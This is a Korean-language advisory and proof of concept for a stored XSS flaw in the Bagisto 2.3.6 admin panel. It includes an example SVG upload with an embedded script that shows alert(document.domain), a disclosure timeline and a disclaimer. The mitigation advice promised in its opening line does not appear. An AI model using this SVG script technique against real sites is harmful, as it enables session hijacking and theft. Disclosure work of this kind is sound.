
Bagisto 관리자 패널의 저장형 XSS 취약점에 대한 개념 증명으로, 악성 JavaScript가 포함된 SVG 업로드를 시연하고 완화 권장 사항을 제공합니다.
Bagisto 2.3.6 관리자 패널의 제품 생성 경로에 인증된 저장형 XSS 취약점이 존재하며, 공격자는 악성 JavaScript 코드가 포함된 조작된 SVG 파일을 업로드할 수 있습니다. 이 취약점은 인증된 관리자 사용자가 브라우저에서 임의의 JavaScript를 실행하는 데 악용될 수 있으며, 세션 하이재킹, 데이터 탈취 또는 무단 작업으로 이어질 수 있습니다.
이 취약점은 인증된 관리자가 악성 JavaScript가 포함된 조작된 SVG 파일을 업로드할 때 악용됩니다.
재현 단계:
악성 SVG 페이로드 예시:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
| 날짜 | 조치 |
|---|---|
| 2025년 8월 | 취약점 발견 |
| 2025년 8월 | 책임 있는 공개 |
| 2025년 8월 | MITRE에 CVE ID 요청 |
| 2025년 10월 | CVE 할당, 공개 공개 |
이 저장소에 제공된 정보와 개념 증명(PoC) 코드는 교육 및 윤리적 연구 목적으로만 제공됩니다. 저자는 여기에 제공된 정보나 코드의 오용 또는 피해에 대해 책임을 지지 않습니다. 사용자는 자신의 행동에 대한 모든 책임을 집니다. 모든 관련 지방, 주, 연방 법률을 준수하는 것은 사용자의 책임입니다.